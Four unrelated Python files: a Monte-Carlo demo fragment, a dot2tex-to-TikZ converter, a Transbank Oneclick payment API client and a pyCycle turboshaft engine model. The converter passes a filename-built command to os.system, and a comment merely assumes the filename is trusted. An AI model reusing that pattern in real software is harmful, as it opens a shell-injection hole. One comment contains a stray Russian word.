    demo = simul_plot(sample_size, n_dim, n_info, coef_1, coef_2,
                      n_repeat, num_rep, step_size, rnd_seed, plot_on)
    # run the Monte-Carlo experiment and unpack every recorded quantity
    (opt_c_stack, Q_opt_c_stack, la_array_stack, la_var_stack,
     solar_coef_stack, abs_ic_stack, cd_array_stack, cd_var_stack) = demo.simul_func()
    # exercise every plotting method once
    demo.vari_hist(Q_opt_c_stack, la_array_stack, cd_array_stack)
    demo.q_hist(opt_c_stack)
    num_var_to_plot_1 = 15
    print_true_1 = True
    print_true_2 = False
    demo.acc_plot(Q_opt_c_stack, la_var_stack, cd_var_stack, num_var_to_plot_1, print_true_1)
    demo.acc_plot(Q_opt_c_stack, la_var_stack, cd_var_stack, num_var_to_plot_1, print_true_2)
    demo.bl_vari_plot(solar_coef_stack, num_var_to_plot_1)
|
import re
import os
class converter(object):
    """Export a graph figure to TikZ via dot2tex and post-process the output.

    Fixes applied: all TeX/regex strings now use raw strings or doubled
    backslashes (the original relied on invalid escape sequences such as
    ``"\\_"`` and ``"\\d"``, which emit DeprecationWarnings on modern Python
    while producing the same characters); files are opened with context
    managers; the unused ``layer`` variable was removed.
    """

    def __init__(self, params):
        # figure: object exposing to_string() (e.g. a pydot graph) -- TODO confirm
        self.figure = params.get('figure')
        # labelled_nodes: dict mapping node number -> label text;
        # postprocess_tex replaces each value with (label, x_coordinate)
        self.labelled_nodes = params.get('labelled_nodes')
        # basename (no extension) for ../figures/<filename>.{dot,tex}
        self.filename = params.get('filename')

    def export_to_tex(self):
        """Write the figure to a .dot file and convert it with dot2tex."""
        mod_str = self.figure.to_string()
        # context manager guarantees the handle is closed even on error
        with open("../figures/%s.dot" % self.filename, "w+") as f:
            f.write(mod_str)
        cmd = "dot2tex -tmath --figonly ../figures/%s.dot > ../figures/%s.tex" % (self.filename, self.filename)
        # NOTE(review): shell command built from self.filename -- assumed trusted
        os.system(cmd)

    def __construct_labels(self):
        """Build a tikz scope drawing each stored label at its x coordinate."""
        lines = []
        lines.append("\\begin{scope}\n")
        for label in self.labelled_nodes.values():
            # label == (label_text, x_coordinate), as filled by postprocess_tex
            lines.append(" \\draw (%sbp, -10bp) node {%s};\n" % (label[1], label[0]))
        lines.append("\\end{scope}\n")
        return lines

    def postprocess_tex(self):
        """Rewrite the generated .tex file in place.

        Shrinks the picture scale and line width, records the x coordinate of
        every labelled node, and appends the label scope right before
        ``\\end{tikzpicture}``.
        """
        path = "../figures/" + self.filename + ".tex"
        with open(path) as f:
            lines = f.readlines()
        with open(path, "w+") as f:
            for l in lines:
                if "\\begin{tikz" in l:
                    l = "\\begin{tikzpicture}[>=latex,line join=bevel, scale = 0.2]\n"
                if "\\pgfsetlinewidth{1bp}" in l:
                    l = " \\pgfsetlinewidth{0.2bp}\n"
                if "\\draw" in l and any("_{%d}$" % k in l for k in self.labelled_nodes.keys()):
                    # node number from the '_{<n>' subscript of the label
                    node = int(re.search(r"_\{[0-9]+", l).group(0)[2:])
                    # x coordinate from the first '(<digits><sep><digit>' group;
                    # the unescaped '.' is kept from the original (matches any
                    # separator character) -- TODO confirm dot2tex coordinate format
                    x_coordinate = re.search(r"\([0-9]+.[0-9]", l).group(0)[1:]
                    self.labelled_nodes[node] = (self.labelled_nodes[node], x_coordinate)
                if "\\end{tikzpicture}" in l:
                    # inject the label scope just before the picture closes
                    f.writelines(self.__construct_labels())
                f.write(l)

    def export_processed(self):
        """Run the full pipeline: export to TikZ, then post-process."""
        self.export_to_tex()
        self.postprocess_tex()
|
import requests
from transbank.common.headers_builder import HeadersBuilder
from transbank.common.integration_type import IntegrationType, webpay_host
from transbank.common.options import Options, WebpayOptions
from transbank import oneclick
from transbank.error.transaction_authorize_error import TransactionAuthorizeError
from transbank.error.transaction_refund_error import TransactionRefundError
from transbank.error.transaction_status_error import TransactionStatusError
from transbank.oneclick.request import TransactionAuthorizeRequest, TransactionRefundRequest, \
MallTransactionAuthorizeDetails
from transbank.oneclick.response import TransactionAuthorizeResponse, TransactionRefundResponse, \
TransactionStatusResponse
from transbank.oneclick.schema import TransactionAuthorizeRequestSchema, TransactionAuthorizeResponseSchema, \
TransactionRefundRequestSchema, TransactionRefundResponseSchema, TransactionStatusResponseSchema
class MallTransaction(object):
    """Transbank Oneclick Mall transaction endpoints: authorize, refund, status.

    All methods raise the corresponding ``Transaction*Error`` when the API
    responds with a non-2xx status code.

    Fix applied: success was previously tested with ``range(200, 299)``,
    which excludes status 299 — the 2xx class is 200-299 inclusive, so the
    check now uses ``range(200, 300)``.
    """

    @classmethod
    def __base_url(cls, integration_type: IntegrationType):
        # every Oneclick Mall endpoint hangs off this versioned base path
        return "{}/rswebpaytransaction/api/oneclick/v1.2".format(
            webpay_host(integration_type))

    @classmethod
    def build_options(cls, options: Options = None) -> Options:
        """Merge caller-supplied options with the module-level oneclick defaults."""
        alt_options = WebpayOptions(oneclick.commerce_code, oneclick.api_key,
                                    oneclick.integration_type)
        if options is not None:
            # каждое field falls back to the module default when unset
            alt_options.commerce_code = options.commerce_code or oneclick.commerce_code
            alt_options.api_key = options.api_key or oneclick.api_key
            alt_options.integration_type = options.integration_type or oneclick.integration_type
        return alt_options

    @classmethod
    def authorize(cls, user_name: str, tbk_user: str, buy_order: str, details: MallTransactionAuthorizeDetails,
                  options: Options = None) -> TransactionAuthorizeResponse:
        """POST /transactions — authorize a mall transaction for a registered user.

        Raises TransactionAuthorizeError on a non-2xx response.
        """
        options = cls.build_options(options)
        endpoint = '{}/{}'.format(cls.__base_url(options.integration_type), 'transactions')
        request = TransactionAuthorizeRequest(user_name, tbk_user, buy_order, details.details)
        data = TransactionAuthorizeRequestSchema().dumps(request).data
        response = requests.post(endpoint, data,
                                 headers=HeadersBuilder.build(options))
        response_json = response.text
        response_dict = TransactionAuthorizeResponseSchema().loads(response_json).data
        # 2xx success is 200-299 inclusive (range end is exclusive)
        if response.status_code not in range(200, 300):
            raise TransactionAuthorizeError(message=response_dict["error_message"])
        return TransactionAuthorizeResponse(**response_dict)

    @classmethod
    def refund(cls, buy_order: str, child_commerce_code: str, child_buy_order: str, amount: float,
               options: Options = None) -> TransactionRefundResponse:
        """POST /transactions/{buy_order}/refunds — refund (part of) a child transaction.

        Raises TransactionRefundError on a non-2xx response.
        """
        options = cls.build_options(options)
        endpoint = '{}/{}/{}/refunds'.format(cls.__base_url(options.integration_type), 'transactions', buy_order)
        request = TransactionRefundRequest(child_commerce_code, child_buy_order, amount)
        response = requests.post(endpoint, data=TransactionRefundRequestSchema().dumps(request).data,
                                 headers=HeadersBuilder.build(options))
        response_json = response.text
        response_dict = TransactionRefundResponseSchema().loads(response_json).data
        # 2xx success is 200-299 inclusive (range end is exclusive)
        if response.status_code not in range(200, 300):
            raise TransactionRefundError(message=response_dict["error_message"])
        return TransactionRefundResponse(**response_dict)

    @classmethod
    def status(cls, buy_order: str, options: Options = None) -> TransactionStatusResponse:
        """GET /transactions/{buy_order} — query the status of a transaction.

        Raises TransactionStatusError on a non-2xx response.
        """
        options = cls.build_options(options)
        endpoint = '{}/{}/{}'.format(cls.__base_url(options.integration_type), 'transactions', buy_order)
        response = requests.get(endpoint, headers=HeadersBuilder.build(options))
        response_json = response.text
        response_dict = TransactionStatusResponseSchema().loads(response_json).data
        # 2xx success is 200-299 inclusive (range end is exclusive)
        if response.status_code not in range(200, 300):
            raise TransactionStatusError(message=response_dict["error_message"])
        return TransactionStatusResponse(**response_dict)
|
import sys
import numpy as np
import openmdao.api as om
import pycycle.api as pyc
class Turboshaft(om.Group):
    """pyCycle model of a three-spool turboshaft engine.

    Flow path (see the ``pyc.connect_flow`` calls in ``setup``):
    inlet -> duct1 -> LPC -> icduct -> axial HPC -> station-2.5 bleed ->
    centrifugal HPC -> station-3 bleed -> duct6 -> burner -> HPT -> duct43 ->
    LPT -> itduct -> power turbine -> duct12 -> nozzle.

    Spools: HP (both HPC stages driven by the HPT), IP (LPC driven by the
    LPT) and LP (free power turbine, whose shaft power is reported by the
    performance group).
    """

    def initialize(self):
        # One flag switches every element and balance between sizing
        # (design=True) and performance (design=False) mode.
        self.options.declare('design', default=True,
                              desc='Switch between on-design and off-design calculation.')

    def setup(self):
        thermo_spec = pyc.species_data.janaf
        design = self.options['design']
        # --- Cycle elements, in flow-path order ---
        self.add_subsystem('fc', pyc.FlightConditions(thermo_data=thermo_spec, elements=pyc.AIR_MIX))
        self.add_subsystem('inlet', pyc.Inlet(design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX))
        self.add_subsystem('duct1', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX))
        self.add_subsystem('lpc', pyc.Compressor(map_data=pyc.LPCMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX),
                           promotes_inputs=[('Nmech','IP_Nmech')])
        self.add_subsystem('icduct', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX))
        self.add_subsystem('hpc_axi', pyc.Compressor(map_data=pyc.HPCMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX),
                           promotes_inputs=[('Nmech','HP_Nmech')])
        # Interstage bleed feeding the LPT cooling flows.
        self.add_subsystem('bld25', pyc.BleedOut(design=design, bleed_names=['cool1','cool2']))
        self.add_subsystem('hpc_centri', pyc.Compressor(map_data=pyc.HPCMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX),
                           promotes_inputs=[('Nmech','HP_Nmech')])
        # Compressor-exit bleed feeding the HPT cooling flows.
        self.add_subsystem('bld3', pyc.BleedOut(design=design, bleed_names=['cool3','cool4']))
        self.add_subsystem('duct6', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX))
        self.add_subsystem('burner', pyc.Combustor(design=design,thermo_data=thermo_spec,
                                                   inflow_elements=pyc.AIR_MIX,
                                                   air_fuel_elements=pyc.AIR_FUEL_MIX,
                                                   fuel_type='Jet-A(g)'))
        self.add_subsystem('hpt', pyc.Turbine(map_data=pyc.HPTMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX,
                                              bleed_names=['cool3','cool4']),
                           promotes_inputs=[('Nmech','HP_Nmech')])
        self.add_subsystem('duct43', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX))
        self.add_subsystem('lpt', pyc.Turbine(map_data=pyc.LPTMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX,
                                              bleed_names=['cool1','cool2']),
                           promotes_inputs=[('Nmech','IP_Nmech')])
        self.add_subsystem('itduct', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX))
        # Free power turbine on the LP spool (reuses the LPT map).
        self.add_subsystem('pt', pyc.Turbine(map_data=pyc.LPTMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX),
                           promotes_inputs=[('Nmech','LP_Nmech')])
        self.add_subsystem('duct12', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX))
        self.add_subsystem('nozzle', pyc.Nozzle(nozzType='CV', lossCoef='Cv', thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX))
        # --- Shafts and overall performance bookkeeping ---
        self.add_subsystem('lp_shaft', pyc.Shaft(num_ports=1),promotes_inputs=[('Nmech','LP_Nmech')])
        self.add_subsystem('ip_shaft', pyc.Shaft(num_ports=2),promotes_inputs=[('Nmech','IP_Nmech')])
        self.add_subsystem('hp_shaft', pyc.Shaft(num_ports=3),promotes_inputs=[('Nmech','HP_Nmech')])
        self.add_subsystem('perf', pyc.Performance(num_nozzles=1, num_burners=1))
        self.connect('duct1.Fl_O:tot:P', 'perf.Pt2')
        self.connect('hpc_centri.Fl_O:tot:P', 'perf.Pt3')
        self.connect('burner.Wfuel', 'perf.Wfuel_0')
        self.connect('inlet.F_ram', 'perf.ram_drag')
        self.connect('nozzle.Fg', 'perf.Fg_0')
        self.connect('lp_shaft.pwr_in', 'perf.power')
        # Torque hookups: each turbomachine loads its own spool.
        self.connect('pt.trq', 'lp_shaft.trq_0')
        self.connect('lpc.trq', 'ip_shaft.trq_0')
        self.connect('lpt.trq', 'ip_shaft.trq_1')
        self.connect('hpc_axi.trq', 'hp_shaft.trq_0')
        self.connect('hpc_centri.trq', 'hp_shaft.trq_1')
        self.connect('hpt.trq', 'hp_shaft.trq_2')
        self.connect('fc.Fl_O:stat:P', 'nozzle.Ps_exhaust')
        # --- Cycle balances (different unknowns on- vs. off-design) ---
        balance = self.add_subsystem('balance', om.BalanceComp())
        if design:
            # On-design: solve for mass flow, FAR and the three turbine PRs.
            balance.add_balance('W', units='lbm/s', eq_units=None)
            self.connect('balance.W', 'inlet.Fl_I:stat:W')
            self.connect('nozzle.PR', 'balance.lhs:W')
            balance.add_balance('FAR', eq_units='degR', lower=1e-4, val=.017)
            self.connect('balance.FAR', 'burner.Fl_I:FAR')
            self.connect('burner.Fl_O:tot:T', 'balance.lhs:FAR')
            balance.add_balance('lpt_PR', val=1.5, lower=1.001, upper=8, eq_units='hp', rhs_val=0.)
            self.connect('balance.lpt_PR', 'lpt.PR')
            self.connect('ip_shaft.pwr_net', 'balance.lhs:lpt_PR')
            balance.add_balance('hpt_PR', val=1.5, lower=1.001, upper=8, eq_units='hp', rhs_val=0.)
            self.connect('balance.hpt_PR', 'hpt.PR')
            self.connect('hp_shaft.pwr_net', 'balance.lhs:hpt_PR')
            balance.add_balance('pt_PR', val=1.5, lower=1.001, upper=8, eq_units='hp', rhs_val=0.)
            self.connect('balance.pt_PR', 'pt.PR')
            self.connect('lp_shaft.pwr_net', 'balance.lhs:pt_PR')
        else:
            # Off-design: solve for FAR, mass flow and the three spool speeds.
            # Need to check all these balances once power turbine map is updated
            balance.add_balance('FAR', eq_units='lbf', lower=1e-4, val=.017)
            self.connect('balance.FAR', 'burner.Fl_I:FAR')
            self.connect('perf.Fn', 'balance.lhs:FAR')
            balance.add_balance('W', units='lbm/s', eq_units=None)
            self.connect('balance.W', 'inlet.Fl_I:stat:W')
            self.connect('nozzle.Throat:stat:area', 'balance.lhs:W')
            balance.add_balance('IP_Nmech', val=12000.0, units='rpm', lower=1.001, eq_units='hp', rhs_val=0.)
            self.connect('balance.IP_Nmech', 'IP_Nmech')
            self.connect('ip_shaft.pwr_net', 'balance.lhs:IP_Nmech')
            balance.add_balance('HP_Nmech', val=14800.0, units='rpm', lower=1.001, eq_units='hp', rhs_val=0.)
            self.connect('balance.HP_Nmech', 'HP_Nmech')
            self.connect('hp_shaft.pwr_net', 'balance.lhs:HP_Nmech')
            balance.add_balance('LP_Nmech', val=1800.0, units='rpm', lower=1.001, eq_units='hp', rhs_val=0.)
            self.connect('balance.LP_Nmech', 'LP_Nmech')
            self.connect('lp_shaft.pwr_net', 'balance.lhs:LP_Nmech')
        # --- Flow-station connections (define the gas path) ---
        pyc.connect_flow(self, 'fc.Fl_O', 'inlet.Fl_I', connect_w=False)
        pyc.connect_flow(self, 'inlet.Fl_O', 'duct1.Fl_I')
        pyc.connect_flow(self, 'duct1.Fl_O', 'lpc.Fl_I')
        pyc.connect_flow(self, 'lpc.Fl_O', 'icduct.Fl_I')
        pyc.connect_flow(self, 'icduct.Fl_O', 'hpc_axi.Fl_I')
        pyc.connect_flow(self, 'hpc_axi.Fl_O', 'bld25.Fl_I')
        pyc.connect_flow(self, 'bld25.Fl_O', 'hpc_centri.Fl_I')
        pyc.connect_flow(self, 'hpc_centri.Fl_O', 'bld3.Fl_I')
        pyc.connect_flow(self, 'bld3.Fl_O', 'duct6.Fl_I')
        pyc.connect_flow(self, 'duct6.Fl_O', 'burner.Fl_I')
        pyc.connect_flow(self, 'burner.Fl_O', 'hpt.Fl_I')
        pyc.connect_flow(self, 'hpt.Fl_O', 'duct43.Fl_I')
        pyc.connect_flow(self, 'duct43.Fl_O', 'lpt.Fl_I')
        pyc.connect_flow(self, 'lpt.Fl_O', 'itduct.Fl_I')
        pyc.connect_flow(self, 'itduct.Fl_O', 'pt.Fl_I')
        pyc.connect_flow(self, 'pt.Fl_O', 'duct12.Fl_I')
        pyc.connect_flow(self, 'duct12.Fl_O', 'nozzle.Fl_I')
        # Cooling bleed routing (total conditions only).
        pyc.connect_flow(self, 'bld25.cool1', 'lpt.cool1', connect_stat=False)
        pyc.connect_flow(self, 'bld25.cool2', 'lpt.cool2', connect_stat=False)
        pyc.connect_flow(self, 'bld3.cool3', 'hpt.cool3', connect_stat=False)
        pyc.connect_flow(self, 'bld3.cool4', 'hpt.cool4', connect_stat=False)
        # --- Solvers: Newton on the cycle balances, direct linear solve ---
        newton = self.nonlinear_solver = om.NewtonSolver()
        newton.options['atol'] = 1e-6
        newton.options['rtol'] = 1e-6
        newton.options['iprint'] = 2
        newton.options['maxiter'] = 10
        newton.options['solve_subsystems'] = True
        newton.options['max_sub_solves'] = 100
        newton.options['reraise_child_analysiserror'] = False
        newton.linesearch = om.BoundsEnforceLS()
        # newton.linesearch = ArmijoGoldsteinLS()
        # newton.linesearch.options['c'] = .0001
        newton.linesearch.options['bound_enforcement'] = 'scalar'
        newton.linesearch.options['iprint'] = -1
        self.linear_solver = om.DirectSolver()
def viewer(prob, pt, file=sys.stdout):
    """
    Print a report of all the relevant cycle properties for design point *pt*.

    Parameters
    ----------
    prob : om.Problem
        Solved problem containing the Turboshaft model.
    pt : str
        Name of the cycle subsystem (e.g. 'DESIGN') to report on.
    file : file-like, optional
        Destination stream; defaults to ``sys.stdout``.
    """
    print(file=file, flush=True)
    print(file=file, flush=True)
    print(file=file, flush=True)
    print("----------------------------------------------------------------------------", file=file, flush=True)
    print(" POINT:", pt, file=file, flush=True)
    print("----------------------------------------------------------------------------", file=file, flush=True)
    print(" PERFORMANCE CHARACTERISTICS", file=file, flush=True)
    # BUG FIX: the header and summary lines below previously ignored *file*,
    # so reports redirected to a file were missing the performance summary.
    print(" Mach Alt W Fn Fg Fram OPR PSFC ", file=file, flush=True)
    summary = " %7.5f %7.1f %7.3f %7.1f %7.1f %7.1f %7.3f %7.5f" % (
        prob[pt+'.fc.Fl_O:stat:MN'], prob[pt+'.fc.alt'], prob[pt+'.inlet.Fl_O:stat:W'],
        prob[pt+'.perf.Fn'], prob[pt+'.perf.Fg'], prob[pt+'.inlet.F_ram'],
        prob[pt+'.perf.OPR'], prob[pt+'.perf.PSFC'])
    print(summary, file=file, flush=True)
    # Flow-station table, in gas-path order.
    fs_names = ['fc.Fl_O','inlet.Fl_O','duct1.Fl_O','lpc.Fl_O',
                'icduct.Fl_O','hpc_axi.Fl_O','bld25.Fl_O',
                'hpc_centri.Fl_O','bld3.Fl_O','duct6.Fl_O',
                'burner.Fl_O','hpt.Fl_O','duct43.Fl_O','lpt.Fl_O',
                'itduct.Fl_O','pt.Fl_O','duct12.Fl_O','nozzle.Fl_O']
    fs_full_names = [f'{pt}.{fs}' for fs in fs_names]
    pyc.print_flow_station(prob, fs_full_names, file=file)
    comp_names = ['lpc','hpc_axi','hpc_centri']
    comp_full_names = [f'{pt}.{c}' for c in comp_names]
    pyc.print_compressor(prob, comp_full_names, file=file)
    # BUG FIX: pass *file* so the burner table lands in the same report
    # stream as every other table.
    pyc.print_burner(prob, [f'{pt}.burner'], file=file)
    # NOTE(review): the power turbine ('pt') and ip_shaft are not included
    # in the tables below — confirm whether that omission is intentional.
    turb_names = ['hpt','lpt']
    turb_full_names = [f'{pt}.{t}' for t in turb_names]
    pyc.print_turbine(prob, turb_full_names, file=file)
    noz_names = ['nozzle']
    noz_full_names = [f'{pt}.{n}' for n in noz_names]
    pyc.print_nozzle(prob, noz_full_names, file=file)
    shaft_names = ['hp_shaft','lp_shaft']
    shaft_full_names = [f'{pt}.{s}' for s in shaft_names]
    pyc.print_shaft(prob, shaft_full_names, file=file)
    bleed_names = ['bld25', 'bld3']
    bleed_full_names = [f'{pt}.{b}' for b in bleed_names]
    pyc.print_bleed(prob, bleed_full_names, file=file)
if __name__ == "__main__":
    # Build and solve a single on-design point of the Turboshaft model,
    # then print the full cycle report. Off-design points are stubbed out
    # below (see the commented-out sections).
    import time
    from openmdao.api import Problem
    from openmdao.utils.units import convert_units as cu
    prob = om.Problem()
    # All design variables live in one IndepVarComp promoted to the top level.
    des_vars = prob.model.add_subsystem('des_vars', om.IndepVarComp(), promotes=["*"])
    # FOR DESIGN
    des_vars.add_output('alt', 28000., units='ft'),
    des_vars.add_output('MN', 0.5),
    des_vars.add_output('T4max', 2740.0, units='degR'),
    des_vars.add_output('nozz_PR_des', 1.1)
    des_vars.add_output('inlet:ram_recovery', 1.0),
    des_vars.add_output('inlet:MN_out', 0.4),
    des_vars.add_output('duct1:dPqP', 0.0),
    des_vars.add_output('duct1:MN_out', 0.4),
    des_vars.add_output('lpc:PRdes', 5.000),
    des_vars.add_output('lpc:effDes', 0.8900),
    des_vars.add_output('lpc:MN_out', 0.3),
    des_vars.add_output('icduct:dPqP', 0.002),
    des_vars.add_output('icduct:MN_out', 0.3),
    des_vars.add_output('hpc_axi:PRdes', 3.0),
    des_vars.add_output('hpc_axi:effDes', 0.8900),
    des_vars.add_output('hpc_axi:MN_out', 0.25),
    des_vars.add_output('bld25:cool1:frac_W', 0.024),
    des_vars.add_output('bld25:cool2:frac_W', 0.0146),
    des_vars.add_output('bld25:MN_out', 0.3000),
    des_vars.add_output('hpc_centri:PRdes', 2.7),
    des_vars.add_output('hpc_centri:effDes', 0.8800),
    des_vars.add_output('hpc_centri:MN_out', 0.20),
    des_vars.add_output('bld3:cool3:frac_W', 0.1705),
    des_vars.add_output('bld3:cool4:frac_W', 0.1209),
    des_vars.add_output('bld3:MN_out', 0.2000),
    des_vars.add_output('duct6:dPqP', 0.00),
    des_vars.add_output('duct6:MN_out', 0.2000),
    des_vars.add_output('burner:dPqP', 0.050),
    des_vars.add_output('burner:MN_out', 0.15),
    des_vars.add_output('hpt:effDes', 0.89),
    des_vars.add_output('hpt:cool3:frac_P', 1.0),
    des_vars.add_output('hpt:cool4:frac_P', 0.0),
    des_vars.add_output('hpt:MN_out', 0.30),
    des_vars.add_output('duct43:dPqP', 0.0051),
    des_vars.add_output('duct43:MN_out', 0.30),
    des_vars.add_output('lpt:effDes', 0.9),
    des_vars.add_output('lpt:cool1:frac_P', 1.0),
    des_vars.add_output('lpt:cool2:frac_P', 0.0),
    des_vars.add_output('lpt:MN_out', 0.4),
    des_vars.add_output('itduct:dPqP', 0.00),
    des_vars.add_output('itduct:MN_out', 0.4),
    des_vars.add_output('pt:effDes', 0.85),
    des_vars.add_output('pt:MN_out', 0.4),
    des_vars.add_output('duct12:dPqP', 0.00),
    des_vars.add_output('duct12:MN_out', 0.4),
    des_vars.add_output('nozzle:Cv', 0.99),
    des_vars.add_output('lp_shaft:Nmech', 12750., units='rpm'),
    des_vars.add_output('lp_shaft:HPX', 1800.0, units='hp'),
    des_vars.add_output('ip_shaft:Nmech', 12000., units='rpm'),
    des_vars.add_output('hp_shaft:Nmech', 14800., units='rpm'),
    # des_vars.add_output('FAR', 0.02261)
    # des_vars.add_output('W', 10.76, units='lbm/s')
    # OFF DESIGN 1
    des_vars.add_output('OD1_MN', 0.5),
    des_vars.add_output('OD1_alt', 28000.0, units='ft'),
    # des_vars.add_output('OD1_Fn_target', 5497.0, units='lbf'),
    des_vars.add_output('OD1_P_target', 7500.0, units='hp')
    # DESIGN CASE
    # Wire every design variable into the corresponding model input.
    prob.model.add_subsystem('DESIGN', Turboshaft())
    prob.model.connect('alt', 'DESIGN.fc.alt')
    prob.model.connect('MN', 'DESIGN.fc.MN')
    prob.model.connect('T4max', 'DESIGN.balance.rhs:FAR')
    prob.model.connect('nozz_PR_des', 'DESIGN.balance.rhs:W')
    prob.model.connect('inlet:ram_recovery', 'DESIGN.inlet.ram_recovery')
    prob.model.connect('inlet:MN_out', 'DESIGN.inlet.MN')
    prob.model.connect('duct1:dPqP', 'DESIGN.duct1.dPqP')
    prob.model.connect('duct1:MN_out', 'DESIGN.duct1.MN')
    prob.model.connect('lpc:PRdes', 'DESIGN.lpc.PR')
    prob.model.connect('lpc:effDes', 'DESIGN.lpc.eff')
    prob.model.connect('lpc:MN_out', 'DESIGN.lpc.MN')
    prob.model.connect('icduct:dPqP', 'DESIGN.icduct.dPqP')
    prob.model.connect('icduct:MN_out', 'DESIGN.icduct.MN')
    prob.model.connect('hpc_axi:PRdes', 'DESIGN.hpc_axi.PR')
    prob.model.connect('hpc_axi:effDes', 'DESIGN.hpc_axi.eff')
    prob.model.connect('hpc_axi:MN_out', 'DESIGN.hpc_axi.MN')
    prob.model.connect('bld25:cool1:frac_W', 'DESIGN.bld25.cool1:frac_W')
    prob.model.connect('bld25:cool2:frac_W', 'DESIGN.bld25.cool2:frac_W')
    prob.model.connect('bld25:MN_out', 'DESIGN.bld25.MN')
    prob.model.connect('hpc_centri:PRdes', 'DESIGN.hpc_centri.PR')
    prob.model.connect('hpc_centri:effDes', 'DESIGN.hpc_centri.eff')
    prob.model.connect('hpc_centri:MN_out', 'DESIGN.hpc_centri.MN')
    prob.model.connect('bld3:cool3:frac_W', 'DESIGN.bld3.cool3:frac_W')
    prob.model.connect('bld3:cool4:frac_W', 'DESIGN.bld3.cool4:frac_W')
    prob.model.connect('bld3:MN_out', 'DESIGN.bld3.MN')
    prob.model.connect('duct6:dPqP', 'DESIGN.duct6.dPqP')
    prob.model.connect('duct6:MN_out', 'DESIGN.duct6.MN')
    prob.model.connect('burner:dPqP', 'DESIGN.burner.dPqP')
    prob.model.connect('burner:MN_out', 'DESIGN.burner.MN')
    prob.model.connect('hpt:effDes', 'DESIGN.hpt.eff')
    prob.model.connect('hpt:cool3:frac_P', 'DESIGN.hpt.cool3:frac_P')
    prob.model.connect('hpt:cool4:frac_P', 'DESIGN.hpt.cool4:frac_P')
    prob.model.connect('hpt:MN_out', 'DESIGN.hpt.MN')
    prob.model.connect('duct43:dPqP', 'DESIGN.duct43.dPqP')
    prob.model.connect('duct43:MN_out', 'DESIGN.duct43.MN')
    prob.model.connect('lpt:effDes', 'DESIGN.lpt.eff')
    prob.model.connect('lpt:cool1:frac_P', 'DESIGN.lpt.cool1:frac_P')
    prob.model.connect('lpt:cool2:frac_P', 'DESIGN.lpt.cool2:frac_P')
    prob.model.connect('lpt:MN_out', 'DESIGN.lpt.MN')
    prob.model.connect('itduct:dPqP', 'DESIGN.itduct.dPqP')
    prob.model.connect('itduct:MN_out', 'DESIGN.itduct.MN')
    prob.model.connect('pt:effDes', 'DESIGN.pt.eff')
    prob.model.connect('pt:MN_out', 'DESIGN.pt.MN')
    prob.model.connect('duct12:dPqP', 'DESIGN.duct12.dPqP')
    prob.model.connect('duct12:MN_out', 'DESIGN.duct12.MN')
    prob.model.connect('nozzle:Cv', 'DESIGN.nozzle.Cv')
    prob.model.connect('lp_shaft:Nmech', 'DESIGN.LP_Nmech')
    prob.model.connect('lp_shaft:HPX', 'DESIGN.lp_shaft.HPX')
    prob.model.connect('ip_shaft:Nmech', 'DESIGN.IP_Nmech')
    prob.model.connect('hp_shaft:Nmech', 'DESIGN.HP_Nmech')
    # prob.model.connect('FAR', 'DESIGN.burner.Fl_I:FAR')
    # prob.model.connect('W', 'DESIGN.inlet.Fl_I:stat:W')
    # OFF DESIGN CASES
    # Off-design points are currently disabled (empty list); the commented
    # block below shows the intended wiring once the power-turbine map is
    # updated.
    pts = [] # 'OD1','OD2','OD3','OD4','OD5','OD6','OD7','OD8']
    # for pt in pts:
    #     ODpt = prob.model.add_subsystem(pt, Turboshaft(design=False))
    #     prob.model.connect(pt+'_alt', pt+'.fc.alt')
    #     prob.model.connect(pt+'_MN', pt+'.fc.MN')
    #     # prob.model.connect(pt+'_Fn_target', pt+'.thrust_balance.rhs')
    #     prob.model.connect('inlet:ram_recovery', pt+'.inlet.ram_recovery')
    #     prob.model.connect('duct4:dPqP', pt+'.duct4.dPqP')
    #     prob.model.connect('duct6:dPqP', pt+'.duct6.dPqP')
    #     prob.model.connect('burner:dPqP', pt+'.burner.dPqP')
    #     prob.model.connect('duct11:dPqP', pt+'.duct11.dPqP')
    #     prob.model.connect('duct13:dPqP', pt+'.duct13.dPqP')
    #     prob.model.connect('nozzle:Cv', pt+'.nozzle.Cv')
    #     prob.model.connect('duct15:dPqP', pt+'.duct15.dPqP')
    #     prob.model.connect('hp_shaft:HPX', pt+'.hp_shaft.HPX')
    #     prob.model.connect('hpc:cool1:frac_W', pt+'.hpc.cool1:frac_W')
    #     prob.model.connect('hpc:cool1:frac_P', pt+'.hpc.cool1:frac_P')
    #     prob.model.connect('hpc:cool1:frac_work', pt+'.hpc.cool1:frac_work')
    #     prob.model.connect('hpc:cool2:frac_W', pt+'.hpc.cool2:frac_W')
    #     prob.model.connect('hpc:cool2:frac_P', pt+'.hpc.cool2:frac_P')
    #     prob.model.connect('hpc:cool2:frac_work', pt+'.hpc.cool2:frac_work')
    #     prob.model.connect('bld3:cool3:frac_W', pt+'.bld3.cool3:frac_W')
    #     prob.model.connect('bld3:cool4:frac_W', pt+'.bld3.cool4:frac_W')
    #     prob.model.connect('hpc:cust:frac_W', pt+'.hpc.cust:frac_W')
    #     prob.model.connect('hpc:cust:frac_P', pt+'.hpc.cust:frac_P')
    #     prob.model.connect('hpc:cust:frac_work', pt+'.hpc.cust:frac_work')
    #     prob.model.connect('hpt:cool3:frac_P', pt+'.hpt.cool3:frac_P')
    #     prob.model.connect('hpt:cool4:frac_P', pt+'.hpt.cool4:frac_P')
    #     prob.model.connect('lpt:cool1:frac_P', pt+'.lpt.cool1:frac_P')
    #     prob.model.connect('lpt:cool2:frac_P', pt+'.lpt.cool2:frac_P')
    #     prob.model.connect('bypBld:frac_W', pt+'.byp_bld.bypBld:frac_W')
